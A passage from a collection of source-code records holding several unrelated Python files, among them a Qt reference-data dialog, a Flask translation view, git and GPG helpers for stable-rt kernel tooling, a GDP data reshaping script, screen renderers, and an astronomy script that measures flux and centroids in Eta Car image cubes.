tags...)\n# --------------------------------------------------------------------------------------------------------------\nclass ReferenceDataDialog(QDialog, Ui_ReferenceDataDialog):\n # ----------------------------------------------------------------------------------------------------------\n # Params:\n # db - QSqlDatabase object for DB operations\n # table - name of the table to display/edit\n # columns - list of tuples - see helpers.py for details\n # title - title of dialog window\n # search_field - field name which will be used for search from GUI\n # tree_view - table will be displayed as hierarchical tree with help of 3 columns: 'id', 'pid' and 'children_count'\n # ('pid' will identify parent row for current row, and '+' will be displayed for row with 'children_count'>0\n # relations - list of tuples that define lookup relations to other tables in database:\n def __init__(self, db, table, columns, title='',\n search_field=None, toggle=None, tree_view=False, relations=None):\n QDialog.__init__(self)\n self.setupUi(self)\n\n self.selected_id = 0\n self.p_selected_name = ''\n self.dialog_visible = False\n self.selection_enabled = False\n self.tree_view = tree_view\n self.parent = 0\n self.last_parent = 0\n self.group_id = None\n self.group_key_field = None\n self.group_key_index = None\n self.group_fkey_field = None\n self.toggle_state = False\n self.toggle_field = None\n self.search_text = \"\"\n self.search_field = search_field\n\n self.db = db\n self.table = table\n self.Model = UseSqlTable(self, self.table, columns, relations)\n self.delegates = ConfigureTableView(self.DataView, self.Model, columns)\n # Storage of delegates inside class is required to keep ownership and prevent SIGSEGV as\n # https://doc.qt.io/qt-5/qabstractitemview.html#setItemDelegateForColumn says:\n # Any existing column delegate for column will be removed, but not deleted.\n # QAbstractItemView does not take ownership of delegate.\n\n self.GroupLbl.setVisible(False)\n self.GroupCombo.setVisible(False)\n if relations is not None:\n for relation in relations:\n if relation[rel_idx.GROUP_NAME] is not None:\n self.GroupLbl.setVisible(True)\n self.GroupLbl.setText(relation[rel_idx.GROUP_NAME])\n self.GroupCombo.setVisible(True)\n self.group_key_field = relation[rel_idx.KEY_FIELD]\n self.group_key_index = self.Model.fieldIndex(relation[rel_idx.KEY_FIELD])\n self.group_fkey_field = relation[rel_idx.FOREIGN_KEY]\n relation_model = self.Model.relationModel(self.group_key_index)\n self.GroupCombo.setModel(relation_model)\n self.GroupCombo.setModelColumn(relation_model.fieldIndex(relation[rel_idx.LOOKUP_FIELD]))\n self.group_id = relation_model.data(relation_model.index(0,\n relation_model.fieldIndex(self.group_fkey_field)))\n\n self.Toggle.setVisible(False)\n if toggle:\n self.Toggle.setVisible(True)\n self.toggle_field = toggle[0]\n self.Toggle.setText(toggle[1])\n\n self.setWindowTitle(title)\n if self.search_field is not None:\n self.SearchFrame.setVisible(True)\n else:\n self.SearchFrame.setVisible(False)\n self.UpBtn.setVisible(self.tree_view)\n\n self.SearchString.textChanged.connect(self.OnSearchChange)\n self.UpBtn.clicked.connect(self.OnUpClick)\n self.GroupCombo.currentIndexChanged.connect(self.OnGroupChange)\n self.Toggle.stateChanged.connect(self.OnToggleChange)\n self.AddBtn.clicked.connect(self.OnAdd)\n self.RemoveBtn.clicked.connect(self.OnRemove)\n self.CommitBtn.clicked.connect(self.OnCommit)\n self.RevertBtn.clicked.connect(self.OnRevert)\n self.DataView.clicked.connect(self.OnClicked)\n self.DataView.doubleClicked.connect(self.OnDoubleClicked)\n self.DataView.selectionModel().selectionChanged.connect(self.OnRowSelected)\n self.Model.dataChanged.connect(self.OnDataChanged)\n\n self.Model.select()\n self.setFilter()\n\n @Slot()\n def closeEvent(self, event):\n if self.CommitBtn.isEnabled(): # There are uncommited changed in a table\n if QMessageBox().warning(None, g_tr('ReferenceDataDialog', \"Confirmation\"),\n g_tr('ReferenceDataDialog', \"You have uncommited changes. Do you want to close?\"),\n QMessageBox.Yes, QMessageBox.No) == QMessageBox.No:\n event.ignore()\n return\n else:\n self.Model.revertAll()\n event.accept()\n\n # Overload ancestor method to activate/deactivate filters for table view\n def exec_(self, enable_selection=False):\n self.dialog_visible = True\n self.selection_enabled = enable_selection\n self.setFilter()\n res = super().exec_()\n self.dialog_visible = False\n self.resetFilter()\n return res\n\n def getSelectedName(self):\n if self.selected_id == 0:\n return g_tr('ReferenceDataDialog', \"ANY\")\n else:\n return self.p_selected_name\n\n def setSelectedName(self, selected_id):\n pass\n\n @Signal\n def selected_name_changed(self):\n pass\n\n SelectedName = Property(str, getSelectedName, setSelectedName, notify=selected_name_changed)\n\n @Slot()\n def OnDataChanged(self):\n self.CommitBtn.setEnabled(True)\n self.RevertBtn.setEnabled(True)\n\n @Slot()\n def OnAdd(self):\n new_record = self.Model.record()\n if self.tree_view:\n new_record.setValue('pid', self.parent) # set current parent\n assert self.Model.insertRows(0, 1)\n self.Model.setRecord(0, new_record)\n self.CommitBtn.setEnabled(True)\n self.RevertBtn.setEnabled(True)\n\n @Slot()\n def OnRemove(self):\n idx = self.DataView.selectionModel().selection().indexes()\n selected_row = idx[0].row()\n assert self.Model.removeRow(selected_row)\n self.CommitBtn.setEnabled(True)\n self.RevertBtn.setEnabled(True)\n\n @Slot()\n def OnCommit(self):\n if self.group_key_index is not None:\n record = self.Model.record(0)\n group_field = record.value(self.Model.fieldIndex(self.group_key_field))\n if not group_field:\n self.Model.setData(self.Model.index(0, self.group_key_index), self.group_id)\n if not self.Model.submitAll():\n logging.fatal(g_tr('ReferenceDataDialog', \"Submit failed: \") + self.Model.lastError().text())\n return\n self.CommitBtn.setEnabled(False)\n self.RevertBtn.setEnabled(False)\n\n @Slot()\n def OnRevert(self):\n self.Model.revertAll()\n self.CommitBtn.setEnabled(False)\n self.RevertBtn.setEnabled(False)\n\n def resetFilter(self):\n self.DataView.model().setFilter(\"\")\n\n def setFilter(self): # TODO: correctly combine different conditions\n if not self.dialog_visible:\n return\n\n conditions = []\n if self.search_text:\n conditions.append(f\"{self.search_field} LIKE '%{self.search_text}%'\")\n else:\n if self.tree_view:\n conditions.append(f\"pid={self.parent}\")\n\n if self.group_id:\n conditions.append(f\"{self.table}.{self.group_key_field}={self.group_id}\")\n\n if self.toggle_field:\n if not self.toggle_state:\n conditions.append(f\"{self.table}.{self.toggle_field}=1\")\n\n condition = \"\"\n for line in conditions:\n condition += line + \" AND \"\n condition = condition[:-len(\" AND \")]\n\n self.DataView.model().setFilter(condition)\n\n @Slot()\n def OnSearchChange(self):\n self.search_text = self.SearchString.text()\n self.setFilter()\n\n @Slot()\n def OnRowSelected(self, selected, _deselected):\n idx = selected.indexes()\n if idx:\n selected_row = idx[0].row()\n self.selected_id = self.DataView.model().record(selected_row).value('id')\n self.p_selected_name = self.DataView.model().record(selected_row).value('name')\n\n @Slot()\n def OnClicked(self, index):\n if index.column() == 0:\n selected_row = index.row()\n self.parent = self.DataView.model().record(selected_row).value('id')\n self.last_parent = self.DataView.model().record(selected_row).value('pid')\n if self.search_text:\n self.SearchString.setText('') # it will also call self.setFilter()\n else:\n self.setFilter()\n\n @Slot()\n def OnDoubleClicked(self, index):\n self.selected_id = self.DataView.model().record(index.row()).value('id')\n self.p_selected_name = self.DataView.model().record(index.row()).value('name')\n if self.selection_enabled:\n self.setResult(QDialog.Accepted)\n self.close()\n\n @Slot()\n def OnUpClick(self):\n if self.search_text: # list filtered by search string\n return\n current_id = self.DataView.model().record(0).value('id')\n if current_id is None:\n pid = self.last_parent\n else:\n pid = readSQL(self.db,\n f\"SELECT c2.pid FROM {self.table} AS c1 LEFT JOIN {self.table} AS c2 ON c1.pid=c2.id \"\\\n f\"WHERE c1.id = :current_id\", [(\":current_id\", current_id)])\n if pid == '':\n pid = 0\n self.parent = pid\n self.setFilter()\n\n @Slot()\n def OnGroupChange(self, list_id):\n model = self.GroupCombo.model()\n self.group_id = model.data(model.index(list_id, model.fieldIndex(self.group_fkey_field)))\n self.setFilter()\n\n @Slot()\n def OnToggleChange(self, state):\n if state == 0:\n self.toggle_state = False\n else:\n self.toggle_state = True\n self.setFilter()\n\n# ===================================================================================================================\n# Delegates to customize view of columns\n# ===================================================================================================================\n\n# -------------------------------------------------------------------------------------------------------------------\n# Display '+' if element have children\nclass ReferenceTreeDelegate(QStyledItemDelegate):\n def __init__(self, parent=None):\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n painter.save()\n model = index.model()\n children_count = model.data(model.index(index.row(), model.fieldIndex('children_count')), Qt.DisplayRole)\n text = ''\n if children_count:\n text = '+'\n painter.drawText(option.rect, Qt.AlignHCenter, text)\n painter.restore()\n\n# -------------------------------------------------------------------------------------------------------------------\n# Display '*' if true and empty cell if false\n# Toggle True/False by mouse click\nclass ReferenceBoolDelegate(QStyledItemDelegate):\n def __init__(self, parent=None):\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n painter.save()\n model = index.model()\n status = model.data(index, Qt.DisplayRole)\n if status:\n text = ' * '\n else:\n text = ''\n painter.drawText(option.rect, Qt.AlignHCenter, text)\n painter.restore()\n\n def editorEvent(self, event, model, option, index):\n if event.type() == QEvent.MouseButtonPress:\n if model.data(index, Qt.DisplayRole): # Toggle value - from 1 to 0 and from 0 to 1\n model.setData(index, 0)\n else:\n model.setData(index, 1)\n return True\n\n# -------------------------------------------------------------------------------------------------------------------\n# Make integer alignment to the right\nclass ReferenceIntDelegate(QStyledItemDelegate):\n def __init__(self, parent=None):\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n painter.save()\n model = index.model()\n value = model.data(index, Qt.DisplayRole)\n painter.drawText(option.rect, Qt.AlignRight, f\"{value} \")\n painter.restore()\n\n# -------------------------------------------------------------------------------------------------------------------\n# Format unix timestamp into readable form '%d/%m/%Y %H:%M:%S'\nclass ReferenceTimestampDelegate(QStyledItemDelegate):\n def __init__(self, parent=None):\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n painter.save()\n model = index.model()\n timestamp = model.data(index, Qt.DisplayRole)\n if timestamp:\n text = datetime.utcfromtimestamp(timestamp).strftime('%d/%m/%Y %H:%M:%S')\n else:\n text = \"\"\n painter.drawText(option.rect, Qt.AlignLeft, text)\n painter.restore()\n\n# -------------------------------------------------------------------------------------------------------------------\n# The class itself is empty but it activates built-in editors for lookup tables\nclass ReferenceLookupDelegate(QSqlRelationalDelegate):\n def __init__(self, parent=None):\n QSqlRelationalDelegate.__init__(self, parent)\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Delegate to display tag editor\nclass ReferencePeerDelegate(QSqlRelationalDelegate):\n def __init__(self, parent=None):\n QSqlRelationalDelegate.__init__(self, parent)\n\n def createEditor(self, aParent, option, index):\n peer_selector = ui.PeerSelector(aParent)\n peer_selector.init_db(index.model().database())\n return peer_selector\n\n def setModelData(self, editor, model, index):\n model.setData(index, editor.selected_id)","sub_path":"jal/ui_custom/reference_data.py","file_name":"reference_data.py","file_ext":"py","file_size_in_byte":15072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"323700771","text":"from flask import render_template, Blueprint, request, redirect, url_for, abort, jsonify, g, flash\nfrom project import db, app\nfrom project.models import Translation\nfrom project.communication import Publisher\nfrom .forms import ReusableForm\nimport json\n\ntranslate_blueprint = Blueprint('translate', __name__)\n\ndef is_post():\n return (request.method == 'POST')\n\n#@app.route(\"/\", methods=['GET', 'POST'])\n#@app.route(\"/index\", methods=['GET', 'POST'])\n#@app.route(\"/translate\", methods=['GET', 'POST'])\n@translate_blueprint.route('/', methods=['GET','POST'])\n#@app.cache.memoize(timeout=5)\n@app.cache.cached(timeout=5, key_prefix='page')\ndef translate():\n form = ReusableForm(request.form)\n print (form.errors)\n\n if request.method == 'POST':\n text=request.form['text']\n print (text)\n \n if form.validate():\n # Save the comment here.\n # save database\n try:\n result = Translation(\n original=text,\n status='requested',\n )\n db.session.add(result)\n db.session.commit()\n \n #app.cache.delete_memoized(get_all_translations)\n app.cache.delete('get_all_translations')\n \n print(\" [x] Saved Text to Translate \" + str(result.id))\n except Exception as e:\n print (e)\n flash('Error: Saving database')\n return redirect(url_for('translate.html', form=form))\n\n #send request\n publisher = Publisher()\n publisher.publish(json.dumps(result.as_dict()))\n print(\" [x] Sent Text to Translate \" + json.dumps(result.as_dict()))\n\n flash(text)\n else:\n flash('Error: Text is required')\n \n translations = get_all_translations() \n\n return render_template('translate.html', title='Home', form=form,\n translations=translations)\n\n#@app.cache.memoize()\n@app.cache.cached(timeout=5, key_prefix='get_all_translations')\ndef get_all_translations():\n return Translation.query.order_by(Translation.translated_count.desc()).all()","sub_path":"web/project/translate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300496270","text":"#!/usr/bin/env python3\n#\n# srt - stable rt tooling\n#\n# Copyright (c) Siemens AG, 2018\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE\n\n\nimport os\nimport re\nimport sys\nfrom configparser import SafeConfigParser\nfrom logging import debug, error\nfrom subprocess import PIPE, CalledProcessError, run\n\n\ndef cmd(args, verbose=False, env=None):\n if verbose:\n print(' '.join(args))\n debug('run: ' + ' '.join(args))\n p = run(args, check=True, stdout=PIPE, env=env)\n r = p.stdout.decode('utf-8').strip()\n debug(' ' + r)\n return r\n\n\ndef get_remote_repo_name():\n line = cmd(['git', 'config', '--get', 'remote.origin.url'])\n name = os.path.splitext(os.path.basename(line))[0]\n return name\n\n\ndef get_local_branch_name():\n return cmd(['git', 'rev-parse', '--abbrev-ref', 'HEAD']).strip()\n\n\ndef get_remote_branch_name(short=True):\n name = cmd(['git', 'rev-parse', '--abbrev-ref',\n '--symbolic-full-name', '@{u}'])\n if short:\n return name.split('/')[1]\n return name\n\n\ndef tag_exists(tag):\n try:\n run(['git', 'rev-parse', '--verify',\n '--quiet', '{0}^{{tag}}'.format(tag)],\n check=True, stdout=PIPE)\n except CalledProcessError:\n return False\n return True\n\n\ndef get_last_tag(branch_name, postfix=None):\n if postfix:\n base_branch = branch_name[:-len(postfix)]\n else:\n base_branch = branch_name\n last_tag = cmd(['git', 'describe', '--abbrev=0', '--tags', base_branch])\n return last_tag\n\n\ndef get_last_rt_tag(branch_name, postfix=None):\n last_tag = get_last_tag(branch_name, postfix)\n m = re.search(r'(-rt[0-9]+)$', last_tag)\n if not m:\n print('Last tag {0} does not end in -rt[0-9]+ on {1}'.\n format(last_tag, branch_name),\n file=sys.stderr)\n sys.exit(1)\n return m.group(1)\n\n\ndef get_old_tag():\n last_tag = get_last_tag(get_remote_branch_name())\n\n import logging\n log = logging.getLogger()\n log.debug(last_tag)\n\n m = re.match(r'^v(\\d+)\\.(\\d+)\\.(\\d+)-rt(\\d+)(-rc(\\d+))?$', last_tag)\n major = int(m.group(1))\n minor = int(m.group(2))\n base_version = 'v{}.{}'.format(major, minor)\n\n tags = cmd(['git', 'ls-remote', '--tags'])\n match = r'.*({}\\.\\d+-rt\\d+)$'.format(base_version)\n m = re.findall(match, tags, re.MULTILINE)\n if not m:\n print('Last remote tag -rt[0-9]+ not found on {}'.\n format(get_remote_branch_name()))\n sys.exit(1)\n\n last_patch = 0\n last_rt = 0\n last_rc = None\n for f in m:\n m2 = re.match(r'^v(\\d+)\\.(\\d+)\\.(\\d+)-rt(\\d+)(-rc(\\d+))?$', f)\n patch = int(m2.group(3))\n rt = int(m2.group(4))\n\n if patch > last_patch:\n last_patch = patch\n last_rt = rt\n\n if rt > last_rt:\n last_rt = rt\n\n if len(m2.groups()) > 4:\n rc = m2.group(5)\n if last_rc and rc > last_rc:\n last_rc = rc\n\n tag = '{}.{}-rt{}'.format(base_version, last_patch, last_rt)\n if last_rc:\n tag = tag + '-rc{}'.format(last_rc)\n return tag\n\n\ndef is_dirty():\n line = cmd(['git', 'status', '--short'])\n if line != '':\n return True\n return False\n\n\ndef read_config():\n config = SafeConfigParser()\n dirs = [os.curdir,\n os.path.expanduser('~/.config/'),\n os.path.expanduser('~'),\n '/etc/srt']\n if 'SRT_CONF' in os.environ:\n dirs.insert(0, os.environ.get('SRT_CONF'))\n config.read(list(map(lambda x: x + '/srt.conf', dirs)))\n return config\n\n\ndef get_config():\n try:\n repo_name = get_remote_repo_name()\n branch_name = get_remote_branch_name(short=False)\n config_name = '{0}/{1}'.format(repo_name, branch_name)\n debug('Using configuration {0}'.format(config_name))\n config = read_config()[config_name]\n except CalledProcessError:\n error('Could not retrieve configuration {0} from srt.conf'.format(\n config_name))\n sys.exit(1)\n\n return config\n\n\ndef get_gnupghome(config):\n gnupghome = os.getenv('GNUPGHOME', '~/.gnupg')\n if 'GNUPGHOME' in config:\n gnupghome = config['GNUPGHOME']\n return gnupghome\n\n\ndef get_gpg_fingerprint(config):\n out = cmd(['gpg2',\n '--homedir', get_gnupghome(config),\n '--local-user', '{}'.format(config['GPG_KEY_ID']),\n '--fingerprint'])\n\n # thank you gpg for nothing!\n fingerprint = ''\n cnt = 0\n for line in out.splitlines():\n if cnt == 3:\n fingerprint = line.strip()\n break\n cnt += 1\n return fingerprint\n\n\ndef confirm(text):\n try:\n while True:\n reply = str(input(text + ' (y/n): ')).lower().strip()\n if reply[:1] == 'y':\n return True\n if reply[:1] == 'n':\n return False\n except KeyboardInterrupt:\n return False\n\n\ndef check_context(ctx):\n if ctx.old_tag == ctx.new_tag:\n text = ('Something went wrong. '\n 'OLD_TAG and NEW_TAG are the same ({}).\\n'\n 'Did you push your changes already? In this case you need to\\n'\n 'provide the OLD_TAG and NEW_TAG')\n print(text.format(ctx.old_tag))\n exit(1)\n\n tags = [ctx.old_tag, ctx.new_tag, ctx.new_tag.base]\n if not ctx.new_tag.is_rc:\n tags.append(ctx.new_tag.rebase)\n\n for tag in tags:\n debug('Check if tag {0} exists'.format(tag))\n if not tag_exists(tag):\n print('tag {0} doesn\\'t exists'.format(tag), file=sys.stderr)\n return None\n\n return ctx\n","sub_path":"stable_rt_tools/srt_util.py","file_name":"srt_util.py","file_ext":"py","file_size_in_byte":6609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"608922180","text":"import pandas as pd\n\n#df = pd.read_csv(\"population_growth.csv\")\ndf = pd.read_csv('gdp.csv')\n\ni = 0\ndata_new = pd.DataFrame(columns = ['Country Name','Country Code','Indicator Name','Indicator Code','Year'])\n\nindex = 0\nwhile index < 264:\n row = df.loc[index]\n gdp = row[4:66]\n country = row[0]\n code = row[1]\n iname = row[2]\n icode = row[3]\n\n y = 1960\n for x in gdp:\n data_new.loc[i]=([country,code,iname,icode,y])\n i += 1\n y += 1\n index += 1\ndata_new.to_csv(\"newgdp.csv\")\n\n","sub_path":"testing/column_row.py","file_name":"column_row.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461707834","text":"from abc import abstractmethod\nfrom time import sleep\n\nimport cv2\n\n\nclass Renderer(object):\n @abstractmethod\n def update(self, *args, **kwargs):\n raise NotImplementedError\n\nclass PixelRenderer(Renderer):\n\n def __init__(self, width=600, height=600, window_name='obs', delay=1, skip_frame=1, video=False):\n self.window_name = window_name\n self.delay = delay\n cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)\n cv2.resizeWindow(window_name, width, height)\n\n self.video = video\n if video:\n self.vid = cv2.VideoWriter('demo.avi', cv2.VideoWriter_fourcc(*\"XVID\"), float(30), (160, 210), False)\n\n self.counter = 0\n self.skip_frame = skip_frame\n\n\n def update(self, env):\n screen = env.render()\n self.counter += 1\n if self.counter%self.skip_frame==0:\n cv2.imshow(self.window_name, screen)\n cv2.waitKey(self.delay)\n if self.video:\n self.vid.write(screen)\n\n def release(self):\n if self.video:\n self.vid.release()\n\nclass PygameRenderer(Renderer):\n def __init__(self, delay=0.1, skip_frame=1):\n self.counter = 0\n self.skip_frame = skip_frame\n self.delay = delay\n\n def update(self, env):\n self.counter += 1\n if self.counter % self.skip_frame == 0:\n env.render()\n sleep(self.delay)\n\n","sub_path":"rltg/utils/Renderer.py","file_name":"Renderer.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"457516863","text":"#!/usr/bin/env python\n\n# extract the radial profile along a given direction (radius,PA)\ndef profile(data, radius, posAngle, slitWidth):\n\n import numpy as np\n import w_subimg\n import copy\n from skimage import measure\n from skimage import feature\n\n ntrans = len(np.unique(data['lineID']))\n nepoch = len(np.unique(data['JD']))\n Phi = np.unique(data['Phi'])\n\n # http://www.python-course.eu/passing_arguments.php\n # https://jeffknupp.com/blog/2012/11/13/is-python-callbyvalue-or-callbyreference-neither/\n dic = copy.deepcopy(data) # <- THIS IS VERY IMPORTANT! KEEP copy.deepcopy()!\n dic['profile'] = [] # new key: line radial profile\n dic['radPos'] = [] # new key: positions where the radial profile was measured\n\n raw_images = [\n data['fileName'],\n data['image'],\n data['pixScale']\n ]\n\n for j in range(ntrans):\n\n for i in range(nepoch):\n\n index = i + j * nepoch\n\n # print(j, i, index, raw_images[0][index], coords_row, coords_col)\n\n if raw_images[0][index] == 'zero.fits':\n raw_images[1][index] = raw_images[1][index] * 0\n\n img = copy.deepcopy(raw_images[1][index])\n\n rho = radius # length in arcsec\n # theta=0 @ 6:00; theta=90 @ 3:00; theta=180 @ 12:00\n theta = (posAngle + 180. - 360.) if (posAngle >= 180.) else (posAngle + 180.)\n rho_x = rho * np.cos((theta) / 180. * np.pi)\n rho_y = rho * np.sin((theta) / 180. * np.pi)\n\n actual_image = img # transf.resize(raw_images[j][2], raw_images[0][2].shape)\n\n # center of image (same for X and Y)\n x0 = ((img.shape)[0] - 1) / 2\n dx = rho_x / raw_images[2][index]\n dy = rho_y / raw_images[2][index]\n x1 = x0 + dx\n y1 = x0 + dy\n\n # slit width\n lineWidth = slitWidth / raw_images[2][index]\n\n xstart, ystart = x0, x0\n xend, yend = x1, y1\n\n if j == 0:\n xstart0, ystart0, xend0, yend0 = xstart, ystart, xend, yend\n\n # print(j,(xstart,ystart), (xend,yend))\n\n profile = measure.profile_line(actual_image, (xstart,ystart), (xend,yend), linewidth=lineWidth)\n xvar = np.linspace(0,rho,profile.shape[0])\n\n dic[\"profile\"].append(profile)\n dic[\"radPos\"].append(xvar)\n\n return dic\n\n\n# measure the centroid of a defined region (for now, a box)\ndef position(data, coords_row, coords_col):\n\n import numpy as np\n import w_subimg\n import copy\n from skimage import measure\n from skimage import feature\n\n ntrans = len(np.unique(data['lineID']))\n nepoch = len(np.unique(data['JD']))\n Phi = np.unique(data['Phi'])\n\n # http://www.python-course.eu/passing_arguments.php\n # https://jeffknupp.com/blog/2012/11/13/is-python-callbyvalue-or-callbyreference-neither/\n dic = copy.deepcopy(data) # <- THIS IS VERY IMPORTANT! KEEP copy.deepcopy()!\n dic['coords'] = [] # new key: centroid coordinates (x,y)\n dic['dist'] = [] # new key: centroid position\n dic['pa'] = [] # new key: position angle E from N\n\n raw_images = [\n data['fileName'],\n data['image'],\n data['pixScale']\n ]\n\n for j in range(ntrans):\n\n for i in range(nepoch):\n\n index = i + j * nepoch\n\n # print(j, i, index, raw_images[0][index], coords_row, coords_col)\n\n if raw_images[0][index] == 'zero.fits':\n raw_images[1][index] = raw_images[1][index] * 0\n\n # call the sub-image function\n subimg = w_subimg.main(raw_images[1][index],\n raw_images[2][index],\n coords_row[0], coords_col[0],\n coords_row[1], coords_col[1])\n\n subim_r, extent = subimg[0:2]\n row1, row2, col1, col2 = subimg[2:]\n\n # extracting the subimage\n img = subim_r.astype('double')\n\n mom = measure.moments(img)\n '''\n The following properties can be calculated from raw image moments:\n Area as: m[0, 0].\n Centroid as: {m[0, 1] / m[0, 0], m[1, 0] / m[0, 0]}.\n '''\n centroid = [mom[0,1] / mom[0,0], mom[1,0] / mom[0,0]]\n # centroid2 = get_centroid(img)\n # center of img\n center = (((raw_images[1][index]).shape)[0] - 1) / 2\n cent_col = (center - (col1+centroid[1])) * raw_images[2][index]\n cent_row = (row1+centroid[0] - center) * raw_images[2][index]\n\n # position angle measured E from N\n dist = np.sqrt(cent_col**2 + cent_row**2)\n pa = (2. * np.pi - np.arctan(cent_col/cent_row)) / np.pi * 180.\n\n dic[\"dist\"].append(dist)\n dic[\"coords\"].append([cent_row,cent_col])\n dic[\"pa\"].append(pa)\n\n return dic\n\n\n# measure the flux inside a defined region (for now, a box)\ndef flux(data, coords_row, coords_col):\n\n import numpy as np\n import w_subimg\n import copy\n\n ntrans = len(np.unique(data['lineID']))\n nepoch = len(np.unique(data['JD']))\n Phi = np.unique(data['Phi'])\n\n # http://www.python-course.eu/passing_arguments.php\n # https://jeffknupp.com/blog/2012/11/13/is-python-callbyvalue-or-callbyreference-neither/\n dic = copy.deepcopy(data) # <- THIS IS VERY IMPORTANT! KEEP copy.deepcopy()!\n dic['flux'] = [] # new key\n\n raw_images = [\n data['fileName'],\n data['image'],\n data['pixScale']\n ]\n\n for j in range(ntrans):\n\n for i in range(nepoch):\n\n index = i + j * nepoch\n\n # print(j, i, index, raw_images[0][index], coords_row, coords_col)\n\n if raw_images[0][index] == 'zero.fits':\n raw_images[1][index] = raw_images[1][index] * 0\n\n # call the sub-image function\n subimg = w_subimg.main(raw_images[1][index],\n raw_images[2][index],\n coords_row[0], coords_col[0],\n coords_row[1], coords_col[1])\n\n subim_r, extent = subimg[0:2]\n row1, row2, col1, col2 = subimg[2:]\n\n # extracting the subimage\n img = subim_r.astype('double')\n\n dic[\"flux\"].append(np.sum(img) * (raw_images[2][index] / 0.1)**2)\n\n # print(dic[\"flux\"][0])\n\n return dic\n\n\n\nif __name__ == \"__main__\":\n\n # THIS MODULE CAN BE CALLED IN TWO WAYS:\n # (1) ./herMeasure.py (in which case the code will run with the defaul parameters listed below)\n # (2) from another script by providing the following arguments:\n #\n # --- from here\n #\n\n import numpy as np\n import copy\n import herData, herMeasure\n\n dataDir = '/Volumes/Kerberos/DATA/ETC/her/TEDS_CUBE/NEW/'\n dataList = dataDir + 'data_list.json'\n velMin, velMax = -60, -20\n data = herData.read(dataDir, dataList, velMin, velMax)\n\n ntrans = len(np.unique(data['lineID']))\n nepoch = len(np.unique(data['JD']))\n Phi = np.unique(data['Phi'])\n\n # defining the corners of the area comprising the blobs\n # Weigelt C\n coord1_r_WC, coord2_r_WC = -0.2, +0.3 # -1, +1\n coord1_c_WC, coord2_c_WC = -0.5, -0.1 # -1, +1\n # Weigelt D\n coord1_r_WD, coord2_r_WD = -0.2, -0.8 # -1, +1\n coord1_c_WD, coord2_c_WD = -0.2, +0.3 # -1, +1\n # concatenating\n coords_r_WC = [coord1_r_WC, coord2_r_WC]\n coords_c_WC = [coord1_c_WC, coord2_c_WC]\n coords_r_WD = [coord1_r_WD, coord2_r_WD]\n coords_c_WD = [coord1_c_WD, coord2_c_WD]\n\n flux_WC = herMeasure.flux(data, coords_r_WC, coords_c_WC)\n flux_WD = herMeasure.flux(data, coords_r_WD, coords_c_WD)\n\n pos_WC = herMeasure.position(data, coords_r_WC, coords_c_WC)\n pos_WD = herMeasure.position(data, coords_r_WD, coords_c_WD)\n\n\n # plot the result with something like this:\n # he1_WC = herData.get(flux_WC, key='lineID', value='he1')\n # he1_WC_flux = [he1_WC[i]['flux'] for i in range(nepoch)]\n # he1_WD = herData.get(flux_WD, key='lineID', value='he1')\n # he1_WD_flux = [he1_WD[i]['flux'] for i in range(nepoch)]\n # x = [he1_WC[i]['Phi'] for i in range(nepoch)] or x = np.unique(he1_WC['Phi'])\n # plt.plot(x, he1_WC_flux)\n # plt.plot(x, he1_WD_flux)\n\n ### --- up to here\n\n\n\n ### BELOW IS THE GRAPHIC PART\n\n import matplotlib as mpl\n import matplotlib.pyplot as plt\n from matplotlib.ticker import MaxNLocator\n from mairan_fix_bbox.fix_bbox import fix_bbox\n\n # FLUX\n leg_fontsize = 10\n epoch = Phi\n\n lineID = [u'ar3', u'he1', u'fe3', u'n2', u'fe2', u'ni2']\n line = [u'[Ar\\,{\\sc iii}]~$\\lambda7137$', u'He\\,{\\sc i}~$\\lambda4714$',\n u'[Fe\\,{\\sc iii}]~$\\lambda4659$', u'[N\\,{\\sc ii}]~$\\lambda5756$',\n u'[Fe\\,{\\sc ii}]~$\\lambda4815$', u'[Ni\\,{\\sc ii}]~$\\lambda7413$']\n\n markers = ['D', 'o']\n colors = ['k', 'r']\n\n legentTextID = ['Weigelt C', 'Weigelt D']\n\n # X and Y for plotting\n ionData_flux1 = np.empty((len(lineID), nepoch))\n ionData_flux2 = np.empty((len(lineID), nepoch))\n varx = np.unique(data['Phi'])\n\n for i in range(len(lineID)):\n # the order of the list entries is defined by the order in var 'lineID' above\n ionData1 = herData.get(flux_WC, key='lineID', value=lineID[i]) # retrieving the data for the ion\n ionData_flux1[i,:] = [ionData1[x]['flux'] for x in range(nepoch)] # storing the flux for each epoch\n\n ionData2 = herData.get(flux_WD, key='lineID', value=lineID[i]) # retrieving the data for the ion\n ionData_flux2[i,:] = [ionData2[x]['flux'] for x in 